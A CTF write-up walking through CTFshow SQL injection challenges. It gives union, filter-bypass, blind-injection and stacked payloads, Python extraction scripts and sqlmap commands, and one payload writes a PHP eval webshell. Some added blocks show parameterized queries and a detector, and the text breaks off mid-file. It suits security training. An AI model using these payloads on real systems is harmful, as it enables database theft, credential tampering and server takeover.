[Complete SQL Injection] CTFshow SQL Injection WriteUp

This post was last updated on 1 February 2022 at 21:16.

Prerequisites:

Dumping the database names:

select 1,(select group_concat(schema_name) from information_schema.schemata),3

Dumping the table names:

select 1,(select group_concat(table_name) from information_schema.tables where table_schema="数据库名") ,3

Dumping the column names:

select 1,(select group_concat(column_name) from information_schema.columns where table_name="表名"),3

Dumping the data:

select 1,(select group_concat(字段名) from 数据库名.表名),3
# select 1,(select group_concat(password) from security.users),3

Web171——Union-based injection

Open the challenge:

The SQL statement is:

$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";

The id is wrapped in single quotes here, so start with a union-based injection.

Dump the database name:

1' union select 1,2,database();--+

Database name: ctfshow_web

Dump the table names:

1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema="ctfshow_web");--+

Table: ctfshow_user

Dump the column names:

1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name="ctfshow_user");--+

Columns: id,username,password

Dump the values:

1' union select 1,2,(select group_concat(password) from ctfshow_web.ctfshow_user);--+

This yields the flag.
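As an added example that is not part of the original write-up: the Web171 query reproduced against an in-memory SQLite table (assumed as a stand-in for the challenge's MySQL database, with constructed rows), next to the parameterized query and the input check that close the injection. The union payload is adapted from the one above; `database()` is dropped because SQLite has no such function.

```python
import sqlite3

# Constructed rows standing in for the challenge's ctfshow_user table; not real data.
SEED_ROWS = [
    (1, "admin", "admin_pass"),
    (2, "user", "user_pass"),
    (3, "flag", "ctfshow{constructed-sample-flag}"),
]

# Union payload adapted from Web171 for SQLite: the trailing -- comments out "' limit 1".
UNION_PAYLOAD = "-1' union select username,password from ctfshow_user where username='flag'--"


def make_db():
    """In-memory SQLite database shaped like the challenge table (assumed stand-in)."""
    con = sqlite3.connect(":memory:")
    con.execute("create table ctfshow_user(id integer, username text, password text)")
    con.executemany("insert into ctfshow_user values (?,?,?)", SEED_ROWS)
    return con


def lookup_vulnerable(con, user_id):
    """Mirrors the challenge PHP: the id is concatenated into the SQL text, so a quote
    in the input ends the string literal and the rest of the input is parsed as SQL."""
    sql = ("select username,password from ctfshow_user "
           "where username != 'flag' and id = '" + user_id + "' limit 1")
    return con.execute(sql).fetchone()


def lookup_parameterized(con, user_id):
    """Same query with the id bound as a parameter: whatever the input contains,
    it is compared as a value and never parsed as SQL."""
    sql = ("select username,password from ctfshow_user "
           "where username != 'flag' and id = ? limit 1")
    return con.execute(sql, (user_id,)).fetchone()


def lookup_validated(con, user_id):
    """Defence in depth: an id must be a plain integer before it reaches the query."""
    if not user_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    return lookup_parameterized(con, int(user_id))


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "1"))               # ('admin', 'admin_pass')
    print(lookup_vulnerable(db, UNION_PAYLOAD))     # the flag row leaks
    print(lookup_parameterized(db, UNION_PAYLOAD))  # None
```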

Web172——Union-based injection with flag filtered

Open the challenge:

$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";

//check whether the result contains flag
if($row->username!=='flag'){
    $ret['msg']='查询成功';
}

Because the flag in this challenge is in ctfshow form, it is not filtered.

Payload:

1' union select 1,(select group_concat(password) from ctfshow_web.ctfshow_user2 where username = "flag"); --+

Web173——Bypass with hex

Open the challenge:

$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";

//check whether the result contains flag
if(!preg_match('/flag/i', json_encode($ret))){
    $ret['msg']='查询成功';
}

Same as the previous challenge: flag is filtered, but the filter achieves nothing.

Payload:

1' union select 1,2,(select group_concat(password) from ctfshow_web.ctfshow_user3 where username = "flag");--+

Alternatively, use the hex function to convert the output to hexadecimal.

Web174——Bypass the digit filter with replace

Open the challenge:

$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";

//check whether the result contains flag
if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
    $ret['msg']='查询成功';
}

This challenge filters digits in the returned value, so use replace to substitute each digit and restore them afterwards.

Payload:

-1' union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(hex(username),'1','numa'),'2','numb'),'3','numc'),'4','numd'),'5','nume'),'6','numf'),'7','numg'),'8','numh'),'9','numi'),'0','numj'),replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(hex(password),'1','numa'),'2','numb'),'3','numc'),'4','numd'),'5','nume'),'6','numf'),'7','numg'),'8','numh'),'9','numi'),'0','numj') from ctfshow_user4 where username='flag'--+

Result:

numfnumcnumgnumdnumfnumfnumgnumcnumfnumhnumfFnumgnumgnumgBnumcnumhnumcnumcnumcnumfnumfnumbnumcnumdnumcnuminumfnumenumcnumdnumbDnumfnumbnumcnumenumcnuminumcnumhnumbDnumcnumdnumcnumjnumcnumcnumfnumbnumbDnumfnumanumcnumcnumcnumgnumfnumfnumbDnumcnumanumcnumbnumfnumanumcnumanumfnumdnumcnumjnumcnumbnumcnumdnumfnumfnumcnumanumcnuminumcnumjnumgD

Restoring the digits gives:

63746673686F777B38333662343965342D623539382D343033622D613337662D3132613164303234663139307D

Hex-decoding that:

ctfshow{836b49e4-b598-403b-a37f-12a1d024f190}

Web175——Write a file with outfile

Open the challenge:

$sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;";

//check whether the result contains flag
if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
    $ret['msg']='查询成功';
}

This challenge blocks every ASCII character in the output, so try writing a file with outfile:

1' union select 1,password from ctfshow_user5 where username = 'flag' into outfile '/var/www/html/1.txt' --+

Visiting 1.txt then gives the flag.

Of course, a one-line webshell can also be written directly:

1' union select 1,"<?php eval($_POST[1])?>" into outfile '/var/www/html/1.php' --+

But the webshell does not yield the flag directly.

Web176——Case bypass

Open the challenge:

$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";

Testing shows that this challenge filters lowercase keywords, so uppercase bypasses it directly:

1' OR 1=1 --+

This returns the flag directly.

Web177——Whitespace bypass

This challenge is about bypassing the space filter. The --+ comment returns empty data, so the # comment is used instead, which has to be URL-encoded as %23.

Payloads:

1'/**/or/**/1=1/**/;%23
1'%09or%091=1%09;%23
1'%0bor%0b1=1%0b;%23
1'%0cor%0c1=1%0c;%23
1'%0aor%0a1=1%0a;%23
1'%0dor%0d1=1%0d;%23

So the whitespace substitutes are:

%0a %0b %0c %0d %09 /**/

Web178——Minus sign bypass

The previous challenge's payload works here as well. Because - is filtered, the --+ comment style is blocked, but %23 can be used in its place:

1'/**/or/**/1=1/**/;%23

Web179——Whitespace bypass

This challenge filters the space, %0a, %0b, %0d, %09 and /**/, but %0c is not filtered:

1'%0cor%0c1=1;%23
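Added example, not from the write-up: a small normaliser showing why the per-character blacklists of Web177 to Web179 keep missing variants, and how a detector that percent-decodes and folds every MySQL separator first catches all of them. The naive filter models the separator list described for Web179 (space, %09, %0a, %0b, %0d, /**/); the samples are payloads quoted above plus two constructed benign values.

```python
import re
from urllib.parse import unquote

# Every separator MySQL accepts between tokens: the ASCII space, the %09/%0a/%0b/%0c/%0d
# control characters, the NBSP and inline comments.  Folding all of them to one space
# is what makes keyword matching reliable.
SEPARATORS = re.compile(r"(?:/\*.*?\*/|[ \t\n\x0b\x0c\r\xa0])+", re.S)

# What a tautology or union looks like once the input is normalised.
SUSPICIOUS = [
    re.compile(r"'\s*or\s*\(?\s*\S+?\s*=\s*\S+"),    # 1' or 1=1   /  1111'or(id=26)
    re.compile(r"\bunion\s+select\b"),
    re.compile(r"\b(?:and|or)\s*'[^']*'\s*=\s*'"),   # ...and'a'='a
]


def normalize(raw: str) -> str:
    """Percent-decode, fold every separator variant to one space, lowercase."""
    return SEPARATORS.sub(" ", unquote(raw)).strip().lower()


def naive_filter(raw: str) -> bool:
    """Models the Web179 blacklist: space, %09, %0a, %0b, %0d and /**/ are blocked,
    but %0c (form feed) is forgotten, so 1'%0cor%0c1=1 slips through."""
    return re.search(r"[ \t\n\x0b\r]|/\*\*/", unquote(raw)) is not None


def is_injection(raw: str) -> bool:
    """Detector that matches on the normalised form instead of on the raw bytes."""
    norm = normalize(raw)
    return any(p.search(norm) for p in SUSPICIOUS)


# Payloads quoted in Web176 to Web180 plus two constructed benign inputs.
SAMPLES = {
    "26": False,
    "Abc%0cDef": False,
    "1' OR 1=1 --+": True,
    "1'/**/or/**/1=1/**/;%23": True,
    "1'%09or%091=1%09;%23": True,
    "1'%0cor%0c1=1;%23": True,
    "1111'or(id=26)and'a'='a": True,
}


def evaluate():
    """Return {input: (naive filter hit, normalised detector hit)} for every sample."""
    return {s: (naive_filter(s), is_injection(s)) for s in SAMPLES}


if __name__ == "__main__":
    for sample, (naive, detector) in evaluate().items():
        print(f"{sample!r:35} naive={naive!s:5} normalised={detector}")
```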

Web180——and has higher precedence than or

1111'or(id=26)and'a'='a

Web181——and has higher precedence than or

$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";

This challenge gives the WAF source:

function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select/i', $str);
}

The previous challenge's payload gets through as well:

1111'or(id=26)and'a'='a

Web182——and has higher precedence than or

The WAF is given here too:

//filter the incoming parameter
function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select|flag/i', $str);
}

The previous challenge's payload gets through:

1111'or(id=26)and'a'='a

Web183——Boolean-based blind injection (equals sign filtered)

Open the challenge:

$sql = "select count(pass) from ".$_POST['tableName'].";";

function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into/i', $str);
}

This is a boolean-based blind injection. The equals sign is filtered, so like or regexp is used instead, and each character is inferred from the returned record count.

Script:

import requests

url = "http://39805c2e-d5bd-457f-b6cd-5d9ccffb79b7.challenge.ctf.show:8080/select-waf.php"
flagstr = "{qwertyuiopasdfghjklzxcvbnm0123456789-_}"
# tableName is appended to "select count(pass) from"; substr positions are 1-based,
# and note that "_" is a LIKE wildcard, so it matches at every position
payload = '(ctfshow_user)where(substr(`pass`,{},1)like("{}"))'
flag = ""

for i in range(50):
    for j in flagstr:
        data = {
            "tableName": payload.format(str(i), j)
        }
        res = requests.post(url, data=data)
        # a count of 1 means the guessed character matched
        if "$user_count = 1;" in res.text:
            flag += j
            print(flag)

Web184——Boolean-based blind injection with join, and group aggregation

Open the challenge:

//concatenate the SQL statement to look up the user with the given ID
$sql = "select count(*) from ".$_POST['tableName'].";";

The WAF:

//filter the incoming parameter
function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
}

This challenge filters where, so join combined with on is used instead.

import requests

url = "http://797ffe1a-8995-48be-b2f2-cc57aebb5ded.challenge.ctf.show:8080/select-waf.php"
flagstr = "{qwertyuiopasdfghjklzxcvbnm0123456789-_}"
# quotes are filtered, so the guessed character is supplied as char(<code>)
payload = 'ctfshow_user as a right join ctfshow_user as b on substr(b.pass,{},1)regexp(char({}))'
flag = ""

for i in range(60):
    for j in range(127):
        data = {
            "tableName": payload.format(str(i), str(j))
        }
        res = requests.post(url, data=data)
        # a count of 43 is treated as "the guessed character matched"
        if "$user_count = 43;" in res.text:
            flag += chr(j)
            print(flag)

The result, after a little post-processing:

12ACac12DTdt12FMfmIiHNhnWw{Ee614.5.0.Dd.4-..8.9.1.7-..4.1.4.Aa-..Aa.9.4.2-..Bb.Dd.Cc.0.7.Ff.Bb.Ff.Dd.5.3.3.}
ctfshow{e61450d4-8917-414a-a942-bdc07fbfd533}

Alternatively, hex can be combined with an aggregate function:

payload: tableName=ctfshow_user group by pass having pass like 0x63746673686f777b25

Script:

#   tableName=ctfshow_user group by pass having pass like 0x63746673686f777b25
# tableName=ctfshow_user group by pass having pass like ctfshow{%
import requests

url = "http://797ffe1a-8995-48be-b2f2-cc57aebb5ded.challenge.ctf.show:8080/select-waf.php"
flagstr = "{qwertyuiopasdfghjklzxcvbnm0123456789-_}"
# the hex prefix grows by one character per round; 25 is "%" so LIKE matches the rest
payload = 'ctfshow_user group by pass having pass like 0x{}25'
flag = "63746673686f777b"   # hex of "ctfshow{"


def str_16(ch):
    """Hex of a single character, without the 0x prefix."""
    return hex(ord(ch)).replace("0x", "")


for i in range(65):
    for j in flagstr:
        data = {
            "tableName": payload.format(flag + str_16(j))
        }
        res = requests.post(url, data=data)
        if "$user_count = 1;" in res.text:
            flag += str_16(j)
            print(flag)
            break

Result:

63746673686f777b65363134353064342d383931372d343134612d613934322d6264633037666266643533335f

Decode the hex and adjust slightly to get the flag.

Web185——Constructing numbers

This challenge exploits a database property: true=1, true+true=2.

Script:

import requests

url = "http://0b37eed9-a549-4aff-9764-f27a1301576f.challenge.ctf.show:8080/select-waf.php"
flagstr = "0123456789-}qwertyuiopasdfghjklzxcvbnm{"
flag = ""
payload = "ctfshow_user as a right join ctfshow_user as b on substr(b.pass,{},{})regexp(char({}))"


def num(n):
    """Build the integer n as true+true+... because digits are filtered."""
    res = "true"
    if n == 1:
        return res
    for i in range(n - 1):
        res += "+true"
    return res


for i in range(50):
    for j in flagstr:
        data = {
            "tableName": payload.format(num(i), num(1), num(ord(j)))
        }
        try:
            res = requests.post(url, data=data)
        except requests.RequestException:
            continue
        if "$user_count = 43;" in res.text:
            flag += j
            print(flag)

Web186——Constructing numbers

Same as Web185.

Script:

import requests

url = "http://8194f31b-36e2-43b4-8361-d7d884bb7e20.challenge.ctf.show/select-waf.php"
flagstr = "0123456789-}qwertyuiopasdfghjklzxcvbnm{"
flag = ""
payload = "ctfshow_user as a right join ctfshow_user as b on substr(b.pass,{},{})regexp(char({}))"


def num(n):
    """Build the integer n as true+true+... because digits are filtered."""
    res = "true"
    if n == 1:
        return res
    for i in range(n - 1):
        res += "+true"
    return res


for i in range(50):
    for j in flagstr:
        data = {
            "tableName": payload.format(num(i), num(1), num(ord(j)))
        }
        try:
            res = requests.post(url, data=data)
        except requests.RequestException:
            continue
        if "$user_count = 43;" in res.text:
            flag += j
            print(flag)

Web187——md5(password,true) bypass

md5("ffifdyop",true) = 'or'6]!r,b

select count(*) from ctfshow_user where username = '$username' and password=''or'6]!r,b'
that is:
select count(*) from ctfshow_user where username = '$username' and password= ''or '6]!r,b'
that is:
select count(*) from ctfshow_user where FALSE or TRUE
The or, together with the TRUE that follows it, bypasses the check.

Submit username admin and password ffifdyop to bypass this challenge.
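Added example (not part of the write-up) reproducing the Web187 mechanism in Python: `md5($p, true)` yields raw bytes, and the 16 bytes for ffifdyop begin with `'or'`, which PHP splices into the query unchanged. An in-memory SQLite table with a constructed admin row is assumed as a stand-in for the challenge database; like MySQL, SQLite evaluates the leftover string `'6...'` in boolean context as the number 6, i.e. true. The hardened variant binds a hex digest as a parameter (a production system would use a slow password hash such as bcrypt or Argon2 rather than MD5).

```python
import hashlib
import sqlite3

SAMPLE_PASSWORD = "not-the-real-password"   # constructed; the stored hash derives from it


def make_db():
    """Constructed stand-in for the challenge's ctfshow_user table (assumption)."""
    con = sqlite3.connect(":memory:")
    con.execute("create table ctfshow_user(username text, password text)")
    con.execute("insert into ctfshow_user values (?, ?)",
                ("admin", hashlib.md5(SAMPLE_PASSWORD.encode()).hexdigest()))
    return con


def raw_md5_as_text(password: str) -> str:
    """PHP's md5($p, true) returns 16 raw bytes and string interpolation copies them
    byte for byte; decoding as latin-1 gives the same one-character-per-byte string."""
    return hashlib.md5(password.encode()).digest().decode("latin-1")


def injected_fragment(password: str) -> str:
    """The exact text that ends up in the query for a given password (for inspection)."""
    return "password='" + raw_md5_as_text(password) + "'"


def login_vulnerable(con, username: str, password: str) -> bool:
    """Mirrors Web187: the raw digest is concatenated into the query text. For ffifdyop
    the WHERE clause becomes  username = '...' and password=''or'6...'  and, because
    AND binds tighter than OR, the trailing string alone decides the result."""
    sql = ("select count(*) from ctfshow_user where username = '" + username +
           "' and " + injected_fragment(password))
    return con.execute(sql).fetchone()[0] > 0


def login_hardened(con, username: str, password: str) -> bool:
    """Hex digest (only [0-9a-f], so it can never contain a quote) bound as a parameter;
    the database compares values and never parses user-derived text as SQL."""
    digest = hashlib.md5(password.encode()).hexdigest()
    sql = "select count(*) from ctfshow_user where username = ? and password = ?"
    return con.execute(sql, (username, digest)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    print(repr(injected_fragment("ffifdyop")))        # password=''or'6...'
    print(login_vulnerable(db, "admin", "ffifdyop"))  # True: bypassed
    print(login_hardened(db, "admin", "ffifdyop"))    # False
```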

Web188——MySQL weak type comparison

//concatenate the SQL statement to look up the user with the given ID
$sql = "select pass from ctfshow_user where username = {$username}";

//username check
if(preg_match('/and|or|select|from|where|union|join|sleep|benchmark|,|\(|\)|\'|\"/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
}

//password check
if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
}

//password comparison
if($row['pass']==intval($password)){
    $ret['msg']='登陆成功';
    array_push($ret['data'], array('flag'=>$flag));
}

There is a weak comparison at the intval line, so boldly assume the stored password is a string; passing 0 as the password is then enough.

username=0&password=0

Web189——Blind injection with load_file and a regular expression

The flag is in the file api/index.php.

//concatenate the SQL statement to look up the user with the given ID
$sql = "select pass from ctfshow_user where username = {$username}";

//username check
if(preg_match('/select|and| |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\x26|\x7c|or|into|from|where|join|sleep|benchmark/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
}

//password check
if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
}

//password comparison
if($row['pass']==$password){
    $ret['msg']='登陆成功';
}

This challenge uses the different responses for "wrong password" and "user does not exist" to do blind injection.

The hint says the flag is in api/index.php, so load_file is used to read the file and regexp to match it character by character.

import requests

url = "http://ab1cc1c0-7f6a-401a-8007-9952e223e649.challenge.ctf.show/api/index.php"
flagstr = "0123456789-}qwertyuiopasdfghjklzxcvbnm{"
flag = "ctfshow"
# load_file reads the source; the if() turns a regexp match into a different response
payload = "if(load_file('/var/www/html/api/index.php')regexp('{}'),0,1)"

for i in range(60):
    for j in flagstr:
        data = {
            "username": payload.format(flag + j),
            "password": "0"
        }
        res = requests.post(url, data=data)
        # "\u5bc6\u7801\u9519\u8bef" is the JSON-escaped "密码错误" (wrong password)
        if r'\u5bc6\u7801\u9519\u8bef' in res.text:
            flag += j
            print(flag)

Web190——Boolean-based blind injection using the page response

//password check
if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
}
//password comparison
if($row['pass']==$password){
    $ret['msg']='登陆成功'; }
//TODO: feels like something is missing, strange

Dump the database name:

import requests

url = "http://f9b7c179-d752-45e2-957c-d46bd9111fe3.challenge.ctf.show/api/index.php"
flagstr = "0123456789-}qwertyuiopasdfghjklzxcvbnm{,_"
flag = ""
payload = r"' or if(ascii(substr(database(),{},1))={},0,1)#"

for i in range(40):
    for j in flagstr:
        data = {
            "username": payload.format(str(i), str(ord(j))),
            "password": "0"
        }
        res = requests.post(url, data=data)
        # "\u5bc6\u7801\u9519\u8bef" is the JSON-escaped "密码错误" (wrong password);
        # it is absent when the if() returned 0, i.e. when the guessed character is right
        if r"\u5bc6\u7801\u9519\u8bef" not in res.text:
            flag += j
            print(flag)

Database name: ctfshow_web

Dump the table names:

import requests

url = "http://f9b7c179-d752-45e2-957c-d46bd9111fe3.challenge.ctf.show/api/index.php"
flagstr = "0123456789-}qwertyuiopasdfghjklzxcvbnm{,_"
flag = ""
payload = r"' or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={},0,1)#"

for i in range(40):
    for j in flagstr:
        data = {
            "username": payload.format(str(i), str(ord(j))),
            "password": "0"
        }
        res = requests.post(url, data=data)
        if r"\u5bc6\u7801\u9519\u8bef" not in res.text:
            flag += j
            print(flag)

Tables: ctfshow_fl0g,ctfshow_user

Dump the column names:

import requests

url = "http://f9b7c179-d752-45e2-957c-d46bd9111fe3.challenge.ctf.show/api/index.php"
flagstr = "0123456789-}qwertyuiopasdfghjklzxcvbnm{,_"
flag = ""
# 0x63746673686f775f666c3067 is the hex form of "ctfshow_fl0g"
payload = r"' or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x63746673686f775f666c3067),{},1))={},0,1)#"

for i in range(40):
    for j in flagstr:
        data = {
            "username": payload.format(str(i), str(ord(j))),
            "password": "0"
        }
        res = requests.post(url, data=data)
        if r"\u5bc6\u7801\u9519\u8bef" not in res.text:
            flag += j
            print(flag)

Columns: id,f1ag

Dump the values:

import requests

url = "http://f9b7c179-d752-45e2-957c-d46bd9111fe3.challenge.ctf.show/api/index.php"
flagstr = "0123456789-}qwertyuiopasdfghjklzxcvbnm{,_"
flag = ""
payload = r"' or if(ascii(substr((select group_concat(f1ag) from ctfshow_web.ctfshow_fl0g),{},1))={},0,1)#"

for i in range(40):
    for j in flagstr:
        data = {
            "username": payload.format(str(i), str(ord(j))),
            "password": "0"
        }
        res = requests.post(url, data=data)
        if r"\u5bc6\u7801\u9519\u8bef" not in res.text:
            flag += j
            print(flag)

Web191——Boolean-based blind injection (ord instead of ascii)

//TODO: feels like something is missing, strange
if(preg_match('/file|into|ascii/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
}

import time

import requests

url = "http://c745ae90-d549-44aa-b498-6350c7787061.challenge.ctf.show/api/index.php"
flagstr = "0123456789-}qwertyuiopasdfghjklzxcvbnm{,_"
flag = ""
# ascii is filtered, so ord() does the same job
payload = r"' or if(ord(substr((select group_concat(f1ag) from ctfshow_web.ctfshow_fl0g),{},1))={},0,1)#"

for i in range(60):
    for j in flagstr:
        data = {
            "username": payload.format(str(i), str(ord(j))),
            "password": "0"
        }
        res = requests.post(url, data=data)
        if r"\u5bc6\u7801\u9519\u8bef" not in res.text:
            flag += j
            print(flag)
        time.sleep(0.3)

Web192——Boolean-based blind injection (regexp instead of ord and ascii)

//TODO: feels like something is missing, strange
if(preg_match('/file|into|ascii|ord|hex/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
}

import time

import requests

url = "http://ddd59f53-f877-40a4-97e1-ef74b962b7db.challenge.ctf.show/api/index.php"
flagstr = "0123456789-}qwertyuiopasdfghjklzxcvbnm{,_"
flag = ""
# the if() yields 1 on a regexp match and the comparison ='1 closes the quote
payload = r"' or if(substr((select group_concat(f1ag) from ctfshow_fl0g), {},1)regexp('{}'),1,0) ='1"

for i in range(60):
    for j in flagstr:
        data = {
            "username": payload.format(str(i), str(j)),
            "password": "0"
        }
        res = requests.post(url, data=data)
        # here the condition is inverted: "wrong password" present means a match
        if r"\u5bc6\u7801\u9519\u8bef" in res.text:
            flag += j
            print(flag)
        time.sleep(0.3)

Web193——Boolean-based blind injection (left instead of substr)

//TODO: feels like something is missing, strange
if(preg_match('/file|into|ascii|ord|hex|substr/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
}

Usage of left:

left("abc",2)
returns the first two characters counted from the left, "ab"

mysql> select left("abc",1);
+---------------+
| left("abc",1) |
+---------------+
| a             |
+---------------+
1 row in set (0.00 sec)

mysql> select left("abc",2);
+---------------+
| left("abc",2) |
+---------------+
| ab            |
+---------------+
1 row in set (0.00 sec)

mysql> select left("abc",3);
+---------------+
| left("abc",3) |
+---------------+
| abc           |
+---------------+
1 row in set (0.00 sec)

This challenge switched to a different table: ctfshow_flxg

A small trap.

import time

import requests

url = "http://328932d3-030e-460a-923e-6003243856d4.challenge.ctf.show/api/index.php"
flagstr = "0123456789-}qwertyuiopasdfghjklzxcvbnm{,_"
flag = ""
# left() returns the first i characters, so the whole known prefix plus one guess is matched
payload = r"' or if(left((select group_concat(f1ag) from ctfshow_flxg), {})regexp('{}'),1,0) ='1"

for i in range(60):
    for j in flagstr:
        tj = flag + j
        data = {
            "username": payload.format(str(i), tj),
            "password": "0"
        }
        res = requests.post(url, data=data)
        if r"\u5bc6\u7801\u9519\u8bef" in res.text:
            flag += j
            print(flag)
        time.sleep(0.3)

Web194——Boolean-based blind injection (locate instead of substr and left)

//TODO: feels like something is missing, strange
if(preg_match('/file|into|ascii|ord|hex|substr|char|left|right|substring/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
}

Usage of locate:

locate("ab","abxx")
returns the position of the first argument inside the second, counting from 1

mysql> select locate("ab","abxx");
+---------------------+
| locate("ab","abxx") |
+---------------------+
|                   1 |
+---------------------+
1 row in set (0.00 sec)

mysql> select locate("bx","abxx");
+---------------------+
| locate("bx","abxx") |
+---------------------+
|                   2 |
+---------------------+
1 row in set (0.00 sec)

import time

import requests

url = "http://bd4fa184-8dec-427e-943d-762e0ed0deb9.challenge.ctf.show/api/index.php"
flagstr_full = "0123456789-}qwertyuiopasdfghjklzxcvbnm{,_"
flagstr = "1234567890{-}abcdef"
flag = "ctfshow"
# locate() returns 0 when the prefix does not occur, so the if() selects 1 only on a hit
payload = r"' or if(locate('{}',(select group_concat(f1ag) from ctfshow_flxg)),1,0) ='1"

for i in range(60):
    for j in flagstr:
        tj = flag + j
        data = {
            "username": payload.format(tj),
            "password": "0"
        }
        res = requests.post(url, data=data)
        if r"\u5bc6\u7801\u9519\u8bef" in res.text:
            flag += j
            print(flag)
        time.sleep(0.3)

Web195——Stacked injection (change the password & weak typing)

UPDATE syntax:

UPDATE table_name SET column_name = new_value WHERE column_name = some_value

Use update to change the password:

0;update`ctfshow_user`set`pass`=1

Then log in with username 0 and password 1.

Web198——Stacked injection (swap columns)

The idea is to swap the id and pass columns, then brute-force the id.

import requests

url = 'http://6f1f5536-6bd1-47ee-9192-804119a45a98.challenge.ctf.show/api/'
# three stacked ALTER TABLE statements rename pass -> tmp, id -> pass, tmp -> id (sent once)
payload = '0;alter table ctfshow_user change `pass` `tmp` varchar(255);alter table ctfshow_user change `id` `pass` varchar(255);alter table ctfshow_user change `tmp` `id` varchar(255);'

for i in range(100):
    if i == 0:
        data_1 = {
            'username': payload,
            'password': i
        }
        r_1 = requests.post(url=url, data=data_1).text
    # 0x61646d696e is the hex form of "admin"; the former id is now checked as the password
    data_2 = {
        'username': '0x61646d696e',
        'password': i
    }
    r_2 = requests.post(url=url, data=data_2).text
    if "ctfshow" in r_2:
        print(r_2)

Web199——Stacked injection (using the table name)

1;show tables
ctfshow_user

Web200——Stacked injection (using the table name)

Same as above.

1;show tables
ctfshow_user

Web201——sqlmap (setting referer and user-agent)

python3 sqlmap.py -u "http://3c4da269-373b-4e38-938e-14962076aa95.challenge.ctf.show/api/index.php?id=" --user-agent="sqlmap" --referer="ctf.show" --dump --batch

Web202——sqlmap (setting --data to run as POST)

python3 sqlmap.py -u "http://484dce36-9d60-49ef-bae8-2c045e431c10.challenge.ctf.show/api/index.php" --data="id=1" --user-agent="sqlmap" --referer="ctf.show" --dump --batch

Web203——sqlmap (PUT request)

Note: with a PUT request the Content-Type has to be changed to text/plain, because a PUT request defaults to form encoding.

python3 sqlmap.py -u "http://856e18c1-7fd9-4d88-a6a0-c56917ed00d2.challenge.ctf.show/api/index.php" --method="PUT" --headers="Content-Type: text/plain" --data="id=1" --referer="ctf.show" --dump --batch

Web204——sqlmap (setting a cookie)

python3 sqlmap.py -u http://8cf6081a-568f-46b5-9a9e-e4c2beef9972.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --cookie="ctfshow=84ff260d364f38603acc15780013e5db;PHPSESSID=6jjk7bnrd818k953hkr0ruih6g" --referer="http://8cf6081a-568f-46b5-9a9e-e4c2beef9972.challenge.ctf.show/sqlmap.php" --headers="Content-Type:text/plain" --dump --batch

Web205——sqlmap (--safe-url and --safe-freq for token authentication)

python3 sqlmap.py -u "http://6a5af834-b7e2-419d-9d1c-dc98d487298d.challenge.ctf.show/api/index.php" --referer="ctf.show" --method=PUT --headers="Content-Type:text/plain" --safe-url="http://6a5af834-b7e2-419d-9d1c-dc98d487298d.challenge.ctf.show/api/getToken.php" --safe-freq=1 --data="id=1" -D ctfshow_web -T ctfshow_flax --dump

Web206——sqlmap (sqlmap detects the closing quote automatically)

python3 sqlmap.py -u "http://02c21f8f-68a2-4ee9-80fc-3eaeee5f4185.challenge.ctf.show/api/index.php" --referer="ctf.show" --method=PUT --headers="Content-Type:text/plain" --safe-url="http://02c21f8f-68a2-4ee9-80fc-3eaeee5f4185.challenge.ctf.show/api/getToken.php" --safe-freq=1 --data="id=1" --dump --batch

Web207——sqlmap (tamper script turning spaces into comments)

Here sqlmap's built-in tamper script space2comment.py is used to bypass the space filter.

python3 sqlmap.py -u "http://874902ce-e21a-4ec1-923d-c9c5ec0be297.challenge.ctf.show/api/index.php" --referer="ctf.show" --method=PUT --headers="Content-Type:text/plain" --safe-url="http://874902ce-e21a-4ec1-923d-c9c5ec0be297.challenge.ctf.show/api/getToken.php" --tamper=space2comment.py --safe-freq=1 --data="id=1" -T ctfshow_flaxca --dump --batch

The contents of space2comment.py:

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with comments '/**/'

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
